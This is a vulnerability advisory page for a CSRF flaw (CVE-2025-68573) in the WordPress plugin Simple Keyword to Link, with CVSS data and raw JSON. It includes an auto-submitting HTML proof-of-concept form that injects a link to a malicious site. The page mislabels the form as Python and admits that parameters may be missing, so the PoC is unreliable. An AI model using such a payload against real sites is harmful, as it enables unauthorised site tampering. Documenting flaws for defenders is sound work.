Security Vulnerability Report
中文
CVE-2025-68573 CVSS 5.4 MEDIUM

CVE-2025-68573

Published: 2025-12-24 13:16:24
Last Modified: 2026-04-27 19:16:32

Description

Cross-Site Request Forgery (CSRF) vulnerability in Alessandro Piconi Simple Keyword to Link simple-keyword-to-link allows Cross Site Request Forgery.This issue affects Simple Keyword to Link: from n/a through <= 1.5.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Simple Keyword to Link <= 1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-68573 - Simple Keyword to Link Plugin --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-68573</title> </head> <body> <h1>CSRF PoC for Simple Keyword to Link Plugin</h1> <p>This PoC demonstrates the CSRF vulnerability in Simple Keyword to Link <= 1.5</p> <!-- Form to add malicious keyword link --> <form action="http://target-wordpress-site/wp-admin/admin-post.php" method="POST" id="csrfForm"> <input type="hidden" name="action" value="add_keyword"> <input type="hidden" name="keyword" value="free"> <input type="hidden" name="url" value="https://malicious-site.com"> <input type="hidden" name="target" value="_blank"> <!-- Additional plugin-specific parameters may be required --> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); console.log('CSRF request sent'); </script> <p>If successful, the keyword 'free' will be linked to malicious-site.com</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68573", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:24.300", "lastModified": "2026-04-27T19:16:31.987", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Alessandro Piconi Simple Keyword to Link simple-keyword-to-link allows Cross Site Request Forgery.This issue affects Simple Keyword to Link: from n/a through <= 1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/simple-keyword-to-link/vulnerability/wordpress-simple-keyword-to-link-plugin-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}